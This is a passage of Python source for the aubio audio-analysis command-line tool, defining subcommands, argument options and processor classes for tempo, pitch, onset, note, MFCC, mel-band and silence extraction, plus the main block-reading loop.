def parser_add_subcommand_tempo(subparsers):
    """Register the 'tempo' subcommand and its options."""
    sub = subparsers.add_parser('tempo', help='estimate overall tempo in bpm')
    sub.add_input()
    sub.add_buf_hop_size(buf_size=1024, hop_size=512)
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_tempo)
def parser_add_subcommand_notes(subparsers):
    """Register the 'notes' subcommand and its options."""
    sub = subparsers.add_parser('notes', help='estimate midi-like notes (monophonic)')
    sub.add_input()
    sub.add_buf_hop_size()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_notes)
def parser_add_subcommand_mfcc(subparsers):
    """Register the 'mfcc' subcommand and its options."""
    sub = subparsers.add_parser('mfcc', help='extract Mel-Frequency Cepstrum Coefficients')
    sub.add_input()
    sub.add_buf_hop_size()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_mfcc)
def parser_add_subcommand_melbands(subparsers):
    """Register the 'melbands' subcommand and its options."""
    sub = subparsers.add_parser('melbands', help='extract energies in Mel-frequency bands')
    sub.add_input()
    sub.add_buf_hop_size()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_melbands)
def parser_add_subcommand_quiet(subparsers):
    """Register the 'quiet' subcommand and its options."""
    sub = subparsers.add_parser('quiet', help='extract timestamps of quiet and loud regions')
    sub.add_input()
    sub.add_hop_size()
    sub.add_silence()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_quiet)
def parser_add_subcommand_cut(subparsers):
    """Register the 'cut' subcommand (slice a file at detected onsets)."""
    sub = subparsers.add_parser('cut', help='slice at timestamps')
    sub.add_input()
    method_help = "onset novelty function"
    method_help += " <default|energy|hfc|complex|phase|specdiff|kl|mkl|specflux>"
    sub.add_method(helpstr=method_help)
    sub.add_buf_hop_size()
    sub.add_silence()
    sub.add_threshold(default=0.3)
    sub.add_minioi()
    sub.add_slicer_options()
    sub.add_time_format()
    sub.add_verbose_help()
    sub.set_defaults(process=process_cut)
class AubioArgumentParser(argparse.ArgumentParser):
    """ArgumentParser subclass providing the option groups shared by the
    aubio subcommands (input selection, window sizes, thresholds, formats)."""
    def add_input(self):
        """Add positional <source_uri>, -i/--input and -r/--samplerate."""
        self.add_argument("source_uri", default=None, nargs='?',
                help="input sound file to analyse", metavar = "<source_uri>")
        self.add_argument("-i", "--input", dest = "source_uri2",
                help="input sound file to analyse", metavar = "<source_uri>")
        self.add_argument("-r", "--samplerate",
                metavar = "<freq>", type=int,
                action="store", dest="samplerate", default=0,
                help="samplerate at which the file should be represented")
    def add_verbose_help(self):
        """Add -v/--verbose (counting) and -q/--quiet (forces verbose=0)."""
        self.add_argument("-v","--verbose",
                action="count", dest="verbose", default=1,
                help="make lots of noise [default]")
        self.add_argument("-q","--quiet",
                action="store_const", dest="verbose", const=0,
                help="be quiet")
    def add_buf_hop_size(self, buf_size=512, hop_size=256):
        """Add both -B/--bufsize and -H/--hopsize with the given defaults."""
        self.add_buf_size(buf_size=buf_size)
        self.add_hop_size(hop_size=hop_size)
    def add_buf_size(self, buf_size=512):
        """Add -B/--bufsize (analysis buffer length in frames)."""
        self.add_argument("-B","--bufsize",
                action="store", dest="buf_size", default=buf_size,
                metavar = "<size>", type=int,
                help="buffer size [default=%d]" % buf_size)
    def add_hop_size(self, hop_size=256):
        """Add -H/--hopsize (hop between consecutive analysis frames)."""
        self.add_argument("-H","--hopsize",
                metavar = "<size>", type=int,
                action="store", dest="hop_size", default=hop_size,
                help="overlap size [default=%d]" % hop_size)
    def add_method(self, method='default', helpstr='method'):
        """Add -m/--method with a subcommand-specific help string."""
        self.add_argument("-m","--method",
                metavar = "<method>", type=str,
                action="store", dest="method", default=method,
                help="%s [default=%s]" % (helpstr, method))
    def add_threshold(self, default=None):
        """Add -t/--threshold (its meaning depends on the subcommand)."""
        self.add_argument("-t","--threshold",
                metavar = "<threshold>", type=float,
                action="store", dest="threshold", default=default,
                help="threshold [default=%s]" % default)
    def add_silence(self):
        """Add -s/--silence (silence threshold, default -70)."""
        self.add_argument("-s", "--silence",
                metavar = "<value>", type=float,
                action="store", dest="silence", default=-70,
                help="silence threshold")
    def add_minioi(self, default="12ms"):
        """Add -M/--minioi (minimum inter-onset interval, string with unit)."""
        self.add_argument("-M", "--minioi",
                metavar = "<value>", type=str,
                action="store", dest="minioi", default=default,
                help="minimum Inter-Onset Interval [default=%s]" % default)
    def add_pitch_unit(self, default="Hz"):
        """Add -u/--pitch-unit (Hz, midi, bin or cent)."""
        help_str = "frequency unit, should be one of Hz, midi, bin, cent"
        help_str += " [default=%s]" % default
        self.add_argument("-u", "--pitch-unit",
                metavar = "<value>", type=str,
                action="store", dest="pitch_unit", default=default,
                help=help_str)
    def add_time_format(self):
        """Add -T/--time-format (samples, ms or seconds)."""
        helpstr = "select time values output format (samples, ms, seconds)"
        helpstr += " [default=seconds]"
        self.add_argument("-T", "--time-format",
                metavar='format',
                dest="time_format",
                default=None,
                help=helpstr)
    def add_slicer_options(self):
        """Add the output-directory and slice-grouping options used by 'cut'."""
        self.add_argument("-o","--output", type = str,
                metavar = "<outputdir>",
                action="store", dest="output_directory", default=None,
                help="specify path where slices of the original file should be created")
        self.add_argument("--cut-until-nsamples", type = int,
                metavar = "<samples>",
                action = "store", dest = "cut_until_nsamples", default = None,
                help="how many extra samples should be added at the end of each slice")
        self.add_argument("--cut-every-nslices", type = int,
                metavar = "<samples>",
                action = "store", dest = "cut_every_nslices", default = None,
                help="how many slices should be groupped together at each cut")
        self.add_argument("--cut-until-nslices", type = int,
                metavar = "<slices>",
                action = "store", dest = "cut_until_nslices", default = None,
                help="how many extra slices should be added at the end of each slice")
# some utilities
def samples2seconds(n_frames, samplerate):
    """Format a frame count as seconds, tab-terminated."""
    seconds = n_frames / float(samplerate)
    return "%f\t" % seconds
def samples2milliseconds(n_frames, samplerate):
    """Format a frame count as milliseconds, tab-terminated."""
    millis = 1000. * n_frames / float(samplerate)
    return "%f\t" % millis
def samples2samples(n_frames, _samplerate):
    """Format a frame count as a plain integer, tab-terminated
    (samplerate is accepted for interface parity but unused)."""
    return "%d\t" % n_frames
def timefunc(mode):
    """Return the frames-to-string formatter for *mode*.

    Accepts None/'s'/'seconds', 'ms'/'milliseconds' or 'samples';
    raises ValueError otherwise.
    """
    if mode in (None, 'seconds', 's'):
        return samples2seconds
    if mode in ('ms', 'milliseconds'):
        return samples2milliseconds
    if mode == 'samples':
        return samples2samples
    raise ValueError("invalid time format '%s'" % mode)
# definition of processing classes
class default_process(object):
    """Base class for the subcommand processors: option extraction, output
    time formatting, and a no-op flush hook."""
    def __init__(self, args):
        # argparse.Namespace supports `in` via __contains__
        if 'time_format' in args:
            self.time2string = timefunc(args.time_format)
        # at -vvv and above, echo the options the processor was built with
        if args.verbose > 2 and hasattr(self, 'options'):
            name = type(self).__name__.split('_')[1]
            optstr = ' '.join(['running', name, 'with options', repr(self.options), '\n'])
            sys.stderr.write(optstr)
    def flush(self, frames_read, samplerate):
        # optionally called at the end of process
        pass
    def parse_options(self, args, valid_opts):
        # get any valid options found in a dictionary of arguments
        options = {k :v for k,v in vars(args).items() if k in valid_opts}
        self.options = options
    def remap_pvoc_options(self, options):
        # FIXME: we need to remap buf_size to win_s, hop_size to hop_s
        # adjust python/ext/py-phasevoc.c to understand buf_size/hop_size
        if 'buf_size' in options:
            options['win_s'] = options['buf_size']
            del options['buf_size']
        if 'hop_size' in options:
            options['hop_s'] = options['hop_size']
            del options['hop_size']
        self.options = options
class process_onset(default_process):
    """Print the time of each detected onset."""
    valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
    def __init__(self, args):
        self.parse_options(args, self.valid_opts)
        self.onset = aubio.onset(**self.options)
        if args.threshold is not None:
            self.onset.set_threshold(args.threshold)
        # minioi may be expressed in milliseconds ('12ms'), seconds ('0.2s')
        # or plain samples
        if args.minioi:
            if args.minioi.endswith('ms'):
                self.onset.set_minioi_ms(float(args.minioi[:-2]))
            elif args.minioi.endswith('s'):
                self.onset.set_minioi_s(float(args.minioi[:-1]))
            else:
                self.onset.set_minioi(int(args.minioi))
        if args.silence:
            self.onset.set_silence(args.silence)
        super(process_onset, self).__init__(args)
    def __call__(self, block):
        return self.onset(block)
    def repr_res(self, res, _frames_read, samplerate):
        # res[0] != 0 -> an onset was detected within this block
        if res[0] != 0:
            outstr = self.time2string(self.onset.get_last(), samplerate)
            sys.stdout.write(outstr + '\n')
class process_pitch(default_process):
    """Print one fundamental-frequency estimate per hop."""
    valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
    def __init__(self, args):
        self.parse_options(args, self.valid_opts)
        self.pitch = aubio.pitch(**self.options)
        if args.pitch_unit is not None:
            self.pitch.set_unit(args.pitch_unit)
        # --threshold doubles as the pitch tolerance for this subcommand
        if args.threshold is not None:
            self.pitch.set_tolerance(args.threshold)
        if args.silence is not None:
            self.pitch.set_silence(args.silence)
        super(process_pitch, self).__init__(args)
    def __call__(self, block):
        return self.pitch(block)
    def repr_res(self, res, frames_read, samplerate):
        # one "<time>\t<pitch>" line per processed block
        fmt_out = self.time2string(frames_read, samplerate)
        sys.stdout.write(fmt_out + "%.6f\n" % res[0])
class process_beat(default_process):
    """Print the time of each detected beat."""
    valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
    def __init__(self, args):
        self.parse_options(args, self.valid_opts)
        self.tempo = aubio.tempo(**self.options)
        super(process_beat, self).__init__(args)
    def __call__(self, block):
        return self.tempo(block)
    def repr_res(self, res, _frames_read, samplerate):
        # res[0] != 0 -> a beat fell inside this block
        if res[0] != 0:
            outstr = self.time2string(self.tempo.get_last(), samplerate)
            sys.stdout.write(outstr + '\n')
class process_tempo(process_beat):
    """Collect every beat location and report one overall bpm in flush()."""
    def __init__(self, args):
        super(process_tempo, self).__init__(args)
        self.beat_locations = []
    def repr_res(self, res, _frames_read, samplerate):
        # accumulate silently; the estimate is printed only at flush()
        if res[0] != 0:
            self.beat_locations.append(self.tempo.get_last_s())
    def flush(self, frames_read, samplerate):
        import numpy as np
        if len(self.beat_locations) < 2:
            outstr = "unknown bpm"
        else:
            # bpm derived from consecutive inter-beat intervals
            bpms = 60./ np.diff(self.beat_locations)
            # NOTE(review): the name says median but np.mean is used — confirm
            # which statistic is intended
            median_bpm = np.mean(bpms)
            if len(self.beat_locations) < 10:
                outstr = "%.2f bpm (uncertain)" % median_bpm
            else:
                outstr = "%.2f bpm" % median_bpm
        sys.stdout.write(outstr + '\n')
class process_notes(default_process):
    """Print midi-like note events: "<midi>\t<on-time>" followed by the off time."""
    valid_opts = ['method', 'hop_size', 'buf_size', 'samplerate']
    def __init__(self, args):
        self.parse_options(args, self.valid_opts)
        self.notes = aubio.notes(**self.options)
        super(process_notes, self).__init__(args)
    def __call__(self, block):
        return self.notes(block)
    def repr_res(self, res, frames_read, samplerate):
        if res[2] != 0: # note off
            fmt_out = self.time2string(frames_read, samplerate)
            sys.stdout.write(fmt_out + '\n')
        if res[0] != 0: # note on
            lastmidi = res[0]
            fmt_out = "%f\t" % lastmidi
            fmt_out += self.time2string(frames_read, samplerate)
            sys.stdout.write(fmt_out) # + '\t')
    def flush(self, frames_read, samplerate):
        # terminate the last pending note at end of file
        eof = self.time2string(frames_read, samplerate)
        sys.stdout.write(eof + '\n')
class process_mfcc(default_process):
    """Print one row of MFCC coefficients per hop (phase vocoder -> mfcc)."""
    def __init__(self, args):
        # phase-vocoder options (buf/hop remapped to win_s/hop_s)
        valid_opts1 = ['hop_size', 'buf_size']
        self.parse_options(args, valid_opts1)
        self.remap_pvoc_options(self.options)
        self.pv = aubio.pvoc(**self.options)
        # mfcc extractor options
        valid_opts2 = ['buf_size', 'n_filters', 'n_coeffs', 'samplerate']
        self.parse_options(args, valid_opts2)
        self.mfcc = aubio.mfcc(**self.options)
        # remember all options
        self.parse_options(args, list(set(valid_opts1 + valid_opts2)))
        super(process_mfcc, self).__init__(args)
    def __call__(self, block):
        fftgrain = self.pv(block)
        return self.mfcc(fftgrain)
    def repr_res(self, res, frames_read, samplerate):
        fmt_out = self.time2string(frames_read, samplerate)
        fmt_out += ' '.join(["% 9.7f" % f for f in res.tolist()])
        sys.stdout.write(fmt_out + '\n')
class process_melbands(default_process):
    """Print the per-hop energies of the Mel filterbank bands."""
    def __init__(self, args):
        self.args = args
        # phase-vocoder options (buf/hop remapped to win_s/hop_s)
        valid_opts = ['hop_size', 'buf_size']
        self.parse_options(args, valid_opts)
        self.remap_pvoc_options(self.options)
        self.pv = aubio.pvoc(**self.options)
        # filterbank options (buf_size remapped to win_s as well)
        valid_opts = ['buf_size', 'n_filters']
        self.parse_options(args, valid_opts)
        self.remap_pvoc_options(self.options)
        self.filterbank = aubio.filterbank(**self.options)
        self.filterbank.set_mel_coeffs_slaney(args.samplerate)
        super(process_melbands, self).__init__(args)
    def __call__(self, block):
        fftgrain = self.pv(block)
        return self.filterbank(fftgrain)
    def repr_res(self, res, frames_read, samplerate):
        fmt_out = self.time2string(frames_read, samplerate)
        fmt_out += ' '.join(["% 9.7f" % f for f in res.tolist()])
        sys.stdout.write(fmt_out + '\n')
class process_quiet(default_process):
    """Track transitions between silent and noisy regions."""
    def __init__(self, args):
        self.args = args
        valid_opts = ['hop_size', 'silence']
        self.parse_options(args, valid_opts)
        self.wassilence = 1  # start in the "silent" state
        if args.silence is not None:
            self.silence = args.silence
        super(process_quiet, self).__init__(args)
    def __call__(self, block):
        # return codes:  2 = entered silence, 1 = still silent,
        #               -1 = entered noise,   0 = still noisy
        if aubio.silence_detection(block, self.silence) == 1:
            if self.wassilence != 1:
                self.wassilence = 1
                return 2 # newly found silence
            return 1 # silence again
        else:
            if self.wassilence != 0:
                self.wassilence = 0
                return -1 # newly found noise
            return 0 # noise again
    def repr_res(self, res, frames_read, samplerate):
        # only state transitions are printed
        fmt_out = None
        if res == -1:
            fmt_out = "NOISY: "
        if res == 2:
            fmt_out = "QUIET: "
        if fmt_out is not None:
            fmt_out += self.time2string(frames_read, samplerate)
            sys.stdout.write(fmt_out + '\n')
class process_cut(process_onset):
    """Detect onsets like process_onset, remember them, and slice the
    source file at those positions in flush()."""
    def __init__(self, args):
        super(process_cut, self).__init__(args)
        self.slices = []
        # NOTE(review): overwrites the options dict set by parse_options with
        # the raw argparse namespace — _cut_slice expects the full namespace
        self.options = args
    def __call__(self, block):
        ret = super(process_cut, self).__call__(block)
        if ret: self.slices.append(self.onset.get_last())
        return ret
    def flush(self, frames_read, samplerate):
        from aubio.cut import _cut_slice
        _cut_slice(self.options, self.slices)
        duration = float (frames_read) / float(samplerate)
        base_info = '%(source_file)s' % {'source_file': self.options.source_uri}
        base_info += ' (total %(duration).2fs at %(samplerate)dHz)\n' % \
                {'duration': duration, 'samplerate': samplerate}
        info = "created %d slices from " % len(self.slices)
        info += base_info
        sys.stderr.write(info)
def main():
    """Entry point of the aubio command-line tool.

    Parses arguments, opens the audio source, runs the selected
    subcommand's processor block by block, and prints results.
    Exits with status 1 on usage errors or keyboard interrupt.
    """
    parser = aubio_parser()
    args = parser.parse_args()
    if 'show_version' in args and args.show_version:
        sys.stdout.write('aubio version ' + aubio.version + '\n')
        sys.exit(0)
    elif 'verbose' in args and args.verbose > 3:
        sys.stderr.write('aubio version ' + aubio.version + '\n')
    if 'command' not in args or args.command is None or args.command in ['help']:
        # no command given: print help; exit 0 only for an explicit "help"
        parser.print_help()
        sys.exit(0 if args.command and args.command in ['help'] else 1)
    elif not args.source_uri and not args.source_uri2:
        sys.stderr.write("Error: a source is required\n")
        parser.print_help()
        sys.exit(1)
    elif args.source_uri2 is not None:
        args.source_uri = args.source_uri2
    try:
        with aubio.source(args.source_uri, hop_size=args.hop_size,
                samplerate=args.samplerate) as src:
            # always update args.samplerate to the native samplerate, in
            # case the source was opened with args.samplerate=0
            args.samplerate = src.samplerate
            # create the processor for this subcommand
            processor = args.process(args)
            frames_read = 0
            while True:
                # read new block from source
                block, read = src()
                # execute processor on this block
                res = processor(block)
                # print results for this block
                if args.verbose > 0:
                    processor.repr_res(res, frames_read, src.samplerate)
                # increment total number of frames read
                frames_read += read
                # exit loop at end of file
                if read < src.hop_size:
                    break
            # flush the processor if needed
            processor.flush(frames_read, src.samplerate)
            if args.verbose > 1:
                summary = ("read {:.2f}s"
                           " ({:d} samples in {:d} blocks of {:d})"
                           " from {:s} at {:d}Hz\n")
                sys.stderr.write(summary.format(
                    frames_read / float(src.samplerate),
                    frames_read,
                    frames_read // src.hop_size + 1,
                    src.hop_size,
                    src.uri,
                    src.samplerate))
    except KeyboardInterrupt:
        sys.exit(1)
|
# NOTE(review): the three lines below are extraction residue from a dataset
# viewer page, not part of this script; kept verbatim as comments so the
# file remains valid Python.
# Subsets and Splits
# No community queries yet
# The top public SQL queries from the community will appear here once available.